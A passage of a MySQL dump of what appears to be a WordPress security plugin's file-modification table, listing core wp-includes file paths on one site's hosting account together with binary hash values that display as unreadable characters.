('Oþhu²G¯ýá²&\0ïLÿ', 'wp-includes/Text/Diff/Engine/native.php', '/home/equipm11/public_html/happythinking.com/wp-includes/Text/Diff/Engine/native.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'K÷¦ö·j´„ÏJB', 'Ê5é½lÝ²U”§æ™goKØ\\Ëc„-F`ŸÑA{–^{ð', '', 0, '?'),
('Ç‚-i)ö.ø\\Îèæz„^a', 'wp-includes/Text/Diff/Engine/shell.php', '/home/equipm11/public_html/happythinking.com/wp-includes/Text/Diff/Engine/shell.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'tC»&ª“ ºwBÐæ@Æ', 'þ´¯œÝ™ï§<ƒJ2AœQ<åNI¿¬W|	eW–ÄÐ', '', 0, '?'),
('÷ @ï;€ú*ÏÁ|¨°', 'wp-includes/Text/Diff/Engine/string.php', '/home/equipm11/public_html/happythinking.com/wp-includes/Text/Diff/Engine/string.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÍÀ®Ã¹Óôf rÆýZ', 'º.0Ø¯lŠ>«/H-—/p«4Ã{úDe[%%N‹X', '', 0, '?'),
('e½^#|Û¢TÐ©’ˆz', 'wp-includes/Text/Diff/Engine/xdiff.php', '/home/equipm11/public_html/happythinking.com/wp-includes/Text/Diff/Engine/xdiff.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¹^£LÄ4X×˜o	³÷', 'L\Zä(ƒM ªêÙbþõ;§E¨.Ç:®È)ºCp', '', 0, '?'),
('&¬‘•Rw?~„j­hJ¤D', 'wp-includes/Text/Diff/Renderer/inline.php', '/home/equipm11/public_html/happythinking.com/wp-includes/Text/Diff/Renderer/inline.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ø2Þò³z;/Ã$mù', 'âÃÝÅx	Ò2«ÞE¤°ïÙñZ…³öë Î¼', '', 0, '?'),
('3âÉfQ3àhð5[À£W¹<', 'wp-includes/Text/Diff/Renderer.php', '/home/equipm11/public_html/happythinking.com/wp-includes/Text/Diff/Renderer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'w.âÂóÖ¨"õ&«R²<', '˜÷Û[°9¸#ýcàô¼‘2ÖÏz‚¿›Ð\\²''?œ¨H1', '', 0, '?'),
(']B#Í2èzÚìúbUœÉ/', 'wp-includes/Text/Diff.php', '/home/equipm11/public_html/happythinking.com/wp-includes/Text/Diff.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '$+€¾ç”¡®ä†Á·Á<', '&`Ä~+>eêaúh]c<‚ð~”.òÁf‚Â', '', 0, '?'),
('-kdÏ¯‘ªXßw\\7ŸÀ¯', 'wp-includes/admin-bar.php', '/home/equipm11/public_html/happythinking.com/wp-includes/admin-bar.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '€ÀˆÖ\0ã·5Š¸¬v', 'cA¼Eê@öY¯ëyÅ cŸ!ô:ºœØÞ0''þ', '', 0, '?'),
('ñÐ†$ä±áHd+Ø»Ÿ', 'wp-includes/assets/script-loader-packages.min.php', '/home/equipm11/public_html/happythinking.com/wp-includes/assets/script-loader-packages.min.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'œÚ\\¬×*¬.«]dÙÕ', '~±‘ÊYž\\!¶i\\FP”cM?ÐC»»ºšD‹@''Ÿ', '', 0, '?'),
('ÂO“tg˜\02‘\\‘BÀ”', 'wp-includes/assets/script-loader-packages.php', '/home/equipm11/public_html/happythinking.com/wp-includes/assets/script-loader-packages.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ó\ncSQ*àÍ4LÍ\n', ']U½×.Óm	NYöR­¸A»\nî‡þÀÎü3Q', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
('6±‰ÁfŒ7¼wÿcA\0', 'wp-includes/assets/script-loader-react-refresh-entry.min.php', '/home/equipm11/public_html/happythinking.com/wp-includes/assets/script-loader-react-refresh-entry.min.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¥š›ép¥Ú:PÙp’Û`', 'nØÆ¿‚	„UCŽæÖ‰¹:Êeñå›ô/ãå<¶Õ', '', 0, '?'),
('À:\Z†`gI ô±Ë>P)', 'wp-includes/assets/script-loader-react-refresh-entry.php', '/home/equipm11/public_html/happythinking.com/wp-includes/assets/script-loader-react-refresh-entry.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¥š›ép¥Ú:PÙp’Û`', 'nØÆ¿‚	„UCŽæÖ‰¹:Êeñå›ô/ãå<¶Õ', '', 0, '?'),
('ŒGd³dÌÝ¸ù–ù`Íw', 'wp-includes/assets/script-loader-react-refresh-runtime.min.php', '/home/equipm11/public_html/happythinking.com/wp-includes/assets/script-loader-react-refresh-runtime.min.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‡àšû\0¶!Õj1M/>ûƒ?', ' V<ëÆÕ#Y’&=Æz;­åôI×0ÙÃÃžNlz', '', 0, '?'),
('h¨€c!\\d/é \0L]sD', 'wp-includes/assets/script-loader-react-refresh-runtime.php', '/home/equipm11/public_html/happythinking.com/wp-includes/assets/script-loader-react-refresh-runtime.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‡àšû\0¶!Õj1M/>ûƒ?', ' V<ëÆÕ#Y’&=Æz;­åôI×0ÙÃÃžNlz', '', 0, '?'),
('Guµ^¨/1ÆÔÕSñŽ7', 'wp-includes/atomlib.php', '/home/equipm11/public_html/happythinking.com/wp-includes/atomlib.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Z¿†ÃZA”°2Ï Ô,', '+‹btÆ=U(üá.¦_öÃl¯b§úŒ¾_PË$ÌWÆ}Á', '', 0, '?'),
('&‡Sì§¿o¸$æ÷0øn', 'wp-includes/author-template.php', '/home/equipm11/public_html/happythinking.com/wp-includes/author-template.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‰eo\røòˆðÚo«±ú', 'i¤ö‰\n‹4ªSÁ”ÀG\ZóHº3ŠIxÇKÝ©Âî', '', 0, '?'),
('ðk’çØûGæ\0ûôo', 'wp-includes/block-bindings/pattern-overrides.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-bindings/pattern-overrides.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ëh½ ;	À3X\0Ù', 'Øqÿy…91©ÉÚUÆgÙ£¢©H}{®Õ²ÏCe', '', 0, '?'),
('\0’¨'' 6&H‚v„]Þé', 'wp-includes/block-bindings/post-meta.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-bindings/post-meta.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‰=n°=FUÊ*ì“ÑJ', 'ÀµåMÌî„ÞcàC#÷ÆDÊr”2Ç×e', '', 0, '?'),
(':!‘\\ZÆáHg×sXå', 'wp-includes/block-bindings.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-bindings.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'â²(×A0ð´èŸB§;A''÷', 'Î€ºæûI‚B"Û:6ûrmo®&‡K«¸\ræ2‰', '', 0, '?'),
('DU}øø<‚Þ´D5è Y', 'wp-includes/block-editor.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-editor.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '..QÉƒGG|ûÜùrö', '	UúÜ§F?¶éUø^‹¹´xÈ7¼xå¨u&«ü”Œt˜', '', 0, '?'),
('ÚÊõÆ)ñâ‚D‡«', 'wp-includes/block-i18n.json', '/home/equipm11/public_html/happythinking.com/wp-includes/block-i18n.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'nåóÞ!’¼¤:D™É8æ„', 'ñfý\\t›M&ë\rû1É	$u3Žáó ÔÙç', '', 0, '?'),
('®4)tk‘l#†<ïÝUá', 'wp-includes/block-patterns/query-grid-posts.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-patterns/query-grid-posts.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '/0ÊK±\0F¡ÔOK‰ºM', 'ÞQ^Dæ‹œ‰åûdté5¦¦®TG ð)ËŠhø`ðeÈ ', '', 0, '?'),
('jûdËCT[^êˆRž×ò', 'wp-includes/block-patterns/query-large-title-posts.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-patterns/query-large-title-posts.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‹Q²‹$4ý-ù1øeÂ', ',ªƒCh1z`­qßë‚ÂÀŒŒ©\\2ß‘ŽˆŒ{]', '', 0, '?'),
('@VÐúK$~`*•+c½0£', 'wp-includes/block-patterns/query-medium-posts.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-patterns/query-medium-posts.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '”‡î<üîUÈVýõn­', '#l.®CµÕvãÿâ*ý¬¦œ‚Êæ;¹!†4ˆf', '', 0, '?'),
('ó_ž­œñ…æ<D¤ÁhgÈå', 'wp-includes/block-patterns/query-offset-posts.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-patterns/query-offset-posts.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ˆÞNtW42Û™ :‰µ', '‰Õ¢}=%f|ÞžìVžØ”à#/=È¼¶kÀì–œ*¼ù', '', 0, '?'),
('”Fß‡¨‰È#÷©ataË', 'wp-includes/block-patterns/query-small-posts.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-patterns/query-small-posts.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'f@¯Iàvaý=9 £uQ', 'Í·%w@3#¥£’FŽZq’ t`ïýsÙoÄõ’Ž', '', 0, '?'),
('«5öÃ…³ÆŒ…ãäþmˆ', 'wp-includes/block-patterns/query-standard-posts.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-patterns/query-standard-posts.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÑƒŸÏBUCL³{—', 'í¶:‡Î¤~ÈþÁ‰&ù\rŒCFƒø+âòIá†q_‹e', '', 0, '?'),
('hcÞÎøþ=õ £ðà¯0é', 'wp-includes/block-patterns/social-links-shared-background-color.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-patterns/social-links-shared-background-color.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ˆŽâ}¢Û;`\ZÔ´ˆª', '>ê**°¹?Ä-T*þíH¾%9Ä/ðE¬Vyìf', '', 0, '?'),
('\0ü $Ééð¦Ó™\0Ö«', 'wp-includes/block-patterns.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-patterns.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ']\Z"*¥âÝJ¶×ˆ\Z', '“E4@ûf‹[“Õ\0ä*Ú'';Ù:_—`ð![AÓá)ØM', '', 0, '?'),
('pî}G÷‚JéÎ$âàx', 'wp-includes/block-supports/align.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/align.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ãì''jŸŒoá½y¶ÝJ¢', 'å^ð{L7Å\\bµrò;ÃGîÏ„Râ;ÿ¡ÁÖ’š', '', 0, '?'),
('pb¢‹·ÁA]%êž¢SV8³', 'wp-includes/block-supports/background.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/background.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¡¬“ðh[pv‰ößóÃ', 'þ_Íž¼EóéÇõÕ”ó/Ê6ö‘Þ×{ÖiCtlDåL', '', 0, '?'),
('CV’ž%ÿü˜èœÓi', 'wp-includes/block-supports/border.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/border.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'a…ÕGŒ†óoMµ™–×\\ì', '\ZòoJËÛë(äF"‰›c[ì-9ä¹¹"W¥ÿÖ\rb\Z', '', 0, '?'),
('ËÝg+Ž™¿²ç‘Ê,cìž', 'wp-includes/block-supports/colors.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/colors.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'à€€g5ÿî”+óÅp', '×pˆ8”-ÀÅ6™N¶¶òr»Ï–zfÛ÷˜là¨', '', 0, '?'),
('ò®ò…Å•î‚oi|}Èã', 'wp-includes/block-supports/custom-classname.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/custom-classname.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '=§»æ·FíGrká9²', '{ÍªÅ7ÜâÀ¿*wz\r‹pÂ3†a3Çê…§¾˜7´@', '', 0, '?'),
(']¹J*Æ’XÀºREá', 'wp-includes/block-supports/dimensions.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/dimensions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“Uzò§/\Z;n''zQFì', ':™ŒaøŽ.9=}`|nÑãÜ½i{B°WAÆhKLµ', '', 0, '?'),
('µ§H–Ð¡ð×ó¥YVhZ£', 'wp-includes/block-supports/duotone.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/duotone.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'gdÑC¡3Û«ÚHÅ@', 'Ùº+©!`kïõÔœ±g¸ì‘”ò8NÚfml“''6', '', 0, '?'),
('Öjõ‡‹#¾Ó²©·X%œI', 'wp-includes/block-supports/elements.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/elements.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¹+›\rzI2é\0jÊðô“Ç', '¯,#ÆGÆ7¸øfõ3Âð»QM¨/ªÏ6ÌM*0£ÿ', '', 0, '?'),
('\nz‡Å­Ž}ô{Ç.¶u[¤', 'wp-includes/block-supports/generated-classname.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/generated-classname.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¹¯1H»êRO#š/½§ý}', '?¢½Ý!§jCoöu¸c3e­‰IBÀ=''/õKa¿„', '', 0, '?'),
('¸îÚ™yì2D\na€ú93', 'wp-includes/block-supports/layout.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/layout.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ñÉ”¸ÕfFÏ]¹÷ •', '+-†¥.Ÿ2[ÀÂÀ¾ÍÝ¬™…-c™Ìflïó¢', '', 0, '?'),
('ab*ª”~g°ñyÅÅØy´', 'wp-includes/block-supports/position.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/position.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Pø|­âª­ô²¹®w$JòD', 'ufUæCˆžÇqÚ$Éq¸Ëx+0Øl!ôâ26fX', '', 0, '?'),
('ôåN§4ãØßoúÝº3^P', 'wp-includes/block-supports/settings.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/settings.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'uŠÙlY P8bHì\0†', 'Þa''M¿“X0Ý¤œï|Èï µè\\nÃ‰ÊgóF±jÖ', '', 0, '?'),
('Ësñ¿‰§}rái„½¡ÍS', 'wp-includes/block-supports/shadow.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/shadow.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÝÅšî7 Œë˜gCÊì<ù', 'Ê¨\ZÌœÛQ\\#êhý''È&i¯üýëÂ¦¤ÕSP»Œ', '', 0, '?'),
('A+~/JÄ™4€¸ó$Y*ØÓ', 'wp-includes/block-supports/spacing.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/spacing.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‰0¾mê²Áâ%Îwz', 'Õ¬Å5¥+ÿÿ''ù-KKzhV¬ ¢\\ÐMMF3¤PÓW«Ë', '', 0, '?'),
('}OŸ !Ù¶]öOÍO[Œ', 'wp-includes/block-supports/typography.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/typography.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷ÔN+&MÐÊbú›OGuô', 'ò‚cwœ`XÂ49÷Èí­Š#ûA>WÓ‡¶Â7šy', '', 0, '?'),
('ÏõNè.ñ!Aä2Ö5ÙL', 'wp-includes/block-supports/utils.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-supports/utils.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ápm/Þ9‹øljTä	^', 'íèïWr‡›—Øö«W[\0K)\n\n¨…ÆÅ.ï^u¡µä', '', 0, '?'),
('{aâÀ{4Ó;òÓMoØ²', 'wp-includes/block-template-utils.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-template-utils.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'êG™œá\0TìhqjÀŠ', 'ã—Ää 6Ó7ðÂŒð(Ež\0°foÛ¦''S¿c2½¼', '', 0, '?'),
('¾:ù¢+ˆ˜hy^Wƒ', 'wp-includes/block-template.php', '/home/equipm11/public_html/happythinking.com/wp-includes/block-template.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ŒˆRbèœHH2Àšú¤jav', 'Z''¼‹˜<¨v…äÍ»Æ:¹­91i1¥\nÊxñ', '', 0, '?'),
('ªs8æ''íÆÉ€á\Z%Cx', 'wp-includes/blocks/archives/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/archives/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'yir7Í÷‚éÕ´V¿dÙú', 'ÕOÞä§WF4Y“Ò·™è«‹%\Zä#ÓCçð!EÕnÝO}', '', 0, '?'),
('t5^	kS(1ýézŸG^Æå', 'wp-includes/blocks/archives/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/archives/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÏÏ‚<XýÒ^zÛ—ó!\Z-Õ', '•R«¨/ŠqE$Œ†HŠ\\±év2V§‰˜\0\rêKƒi', '', 0, '?'),
('KÐúxP0&¤€ñO:p', 'wp-includes/blocks/archives/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/archives/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\rv}»'')4~~ðŽ', 'Æ¸óC¾YMÀ€®ð¼a.L¢ÇÝ8ÝyQá°vŸq‚Iø', '', 0, '?'),
('l¹Ìö<»ô#Ýqˆ,æ¡', 'wp-includes/blocks/archives/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/archives/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'GLÏ\0·¸Q’Êìv+s˜', '\0BÅP©ñ}eGu‘ð6ÄâÍ×Ø koŒî\Z­ÿCã', '', 0, '?'),
('—CóQ%ŽŽ@	ÄJa ¹', 'wp-includes/blocks/archives/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/archives/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬ÕœVHÁ³¢¬ZfãºÍ', '4!\0ú}!Œ;9oãl„_¼lâ4¦ßf’ÊL¾ÙV¬l', '', 0, '?'),
('w8h*™\\;°îÍeŠ[Ø', 'wp-includes/blocks/archives/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/archives/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÅÁÄêó™ê	KÝ‘¾Ö‰§', 'È9’Éjé¹ ¤Ù ¬Ñ4ñÆSqðˆ¸Ã²«ê–_\\`ã', '', 0, '?'),
('‘ñR„‰ûpB@LJ§ø', 'wp-includes/blocks/archives/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/archives/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '4?	êóóU­Ewáá', 'äÌ´Ý2I3˜‘ØÁQS*"@L$	˜±"ŒV´?±å', '', 0, '?'),
('Šß35n­o¡~.·Õº', 'wp-includes/blocks/archives/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/archives/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÅÁÄêó™ê	KÝ‘¾Ö‰§', 'È9’Éjé¹ ¤Ù ¬Ñ4ñÆSqðˆ¸Ã²«ê–_\\`ã', '', 0, '?'),
('¸ƒŽˆ×VZÍbl“Í¯', 'wp-includes/blocks/archives/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/archives/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '4?	êóóU­Ewáá', 'äÌ´Ý2I3˜‘ØÁQS*"@L$	˜±"ŒV´?±å', '', 0, '?'),
('Ð>6bY£¹•AUFð.', 'wp-includes/blocks/archives.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/archives.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'fãÆQn²û,Ïwe”Ý', ']ùÁaÚ€j½•à.=™ÕÈZûªõpÑ“„ÝhFËùY', '', 0, '?'),
('Ïüô\\TŸ¨@SOá|m', 'wp-includes/blocks/audio/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/audio/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '—Îœé?¨˜	°þê›h¬', '•\0[žÂÞˆÍDxêeRSù{7¥”¢îMz‚ÄM¯Ë[Ñ§', '', 0, '?'),
('ýla''êP_b—m	!«·Äp', 'wp-includes/blocks/audio/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/audio/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ')„[‹˜¼J÷[7¾²Û>Ÿ', 'vÜ½Z²R}”àZæ±fG|-!Tœ±Uõ¿s¶wo»4', '', 0, '?'),
('ŒÜˆÒyâô7@©µ˜Ö"', 'wp-includes/blocks/audio/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/audio/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Pâ‹ŽÚñªðmŠ{tmoÇ', '}/14¡o|ò‘&X´1»¢»‹Í¦¿Oß8	š7:ža', '', 0, '?'),
('9ÃCe;Y#èv|z—¡', 'wp-includes/blocks/audio/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/audio/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '~R†˜0W˜äÆ@õòyÉ_', 'v•ÖÄCøÂ~Qk[sï2¼B€âª\nÇ©z„›a|n#', '', 0, '?'),
('RÊÈÜ°oLÉ8~\\ÊlCR', 'wp-includes/blocks/audio/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/audio/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Âz…“#Ù@Ï›áäá\0v', 'Í²Šâ×COÂÍRÌ‹©<l%Ânó’\Z¥S>ø*', '', 0, '?'),
('}|¸î\0+…N±6]ª›R', 'wp-includes/blocks/audio/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/audio/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‚G¶½ñ^±äxóò¨[', '^\ZƒVª¶Š’Æ.Ÿ~kZýF(ª+€Ô²\n]ïtÞ€B', '', 0, '?'),
('	2ÎpÏ<(Xž"êÝµ“', 'wp-includes/blocks/audio/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/audio/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÃHFìËÜ[ŒÈö^¨´£', 'å4Kà÷^âÌ<%_×±¥UbPùÉÚTOÿÎ”Tô)É!', '', 0, '?'),
('?ØWZBDùN×1ž3Àå', 'wp-includes/blocks/audio/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/audio/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‚G¶½ñ^±äxóò¨[', '^\ZƒVª¶Š’Æ.Ÿ~kZýF(ª+€Ô²\n]ïtÞ€B', '', 0, '?'),
('šq2t’rÛ—,]s*rº', 'wp-includes/blocks/audio/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/audio/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÃHFìËÜ[ŒÈö^¨´£', 'å4Kà÷^âÌ<%_×±¥UbPùÉÚTOÿÎ”Tô)É!', '', 0, '?'),
('”ó‡ä‚Â$ùOqÕyÜ¹™', 'wp-includes/blocks/audio/theme-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/audio/theme-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¿¢ŠéêÙÐý±ù‡Ë', '\r>3…È;-so\n™¹{ªñs»çU»w¹Nìâ\0Ó!Û', '', 0, '?'),
('¹ç¥l“Ð;+©S›G¼Â', 'wp-includes/blocks/audio/theme-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/audio/theme-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¾\nT&ë!6´‹êNØZ', '¥„jÈÊ#­¤Ôš²v€:‘™=íÐ_½àþ%Œ$Q', '', 0, '?'),
('ô]»Ð˜\nž(ª?W&\\ì´', 'wp-includes/blocks/audio/theme.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/audio/theme.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¿¢ŠéêÙÐý±ù‡Ë', '\r>3…È;-so\n™¹{ªñs»çU»w¹Nìâ\0Ó!Û', '', 0, '?'),
('\nß	¡Ì_{Þãõ–ÕüŸ', 'wp-includes/blocks/audio/theme.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/audio/theme.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¾\nT&ë!6´‹êNØZ', '¥„jÈÊ#­¤Ôš²v€:‘™=íÐ_½àþ%Œ$Q', '', 0, '?'),
('à\Z³tU¨R\r"C©çÌ', 'wp-includes/blocks/avatar/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/avatar/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '_ÐýÙ“BìEà»/A', ')ßq2è•·Êù^‹WâkÚNˆ„¹ÐÌiÿ¼ç¬AŒ0?¬', '', 0, '?'),
('«]_\Z?Ê¤„•wHoç', 'wp-includes/blocks/avatar/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/avatar/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¿8•§äó™Rdµ-uá€Í', '7oéÕWýñÝ¹íö¢±P­¡*ˆŸ\0Ó›€^ÀÅ¨t', '', 0, '?'),
('^—Y¿Kb¦àF2TÔÔT-', 'wp-includes/blocks/avatar/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/avatar/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '«*ú‡‡(\Z¨öîøIzÊ', 'e2º,¢Õ”ùeõÈnÁCšØL]ûöÇsËç+©¢', '', 0, '?'),
('zÁ[´AÖk‚žy…0c¸&', 'wp-includes/blocks/avatar/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/avatar/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¿8•§äó™Rdµ-uá€Í', '7oéÕWýñÝ¹íö¢±P­¡*ˆŸ\0Ó›€^ÀÅ¨t', '', 0, '?'),
('}BfkVÁ=€15lÞg', 'wp-includes/blocks/avatar/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/avatar/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '«*ú‡‡(\Z¨öîøIzÊ', 'e2º,¢Õ”ùeõÈnÁCšØL]ûöÇsËç+©¢', '', 0, '?'),
('TÚ“bûIü‘v}™z5žÔ', 'wp-includes/blocks/avatar/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/avatar/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'D||¶‘ƒP¬ŽyíXGÂê', '~_á8x~5KùŠ<A¸ˆÚð{ðÔØše æÐ', '', 0, '?'),
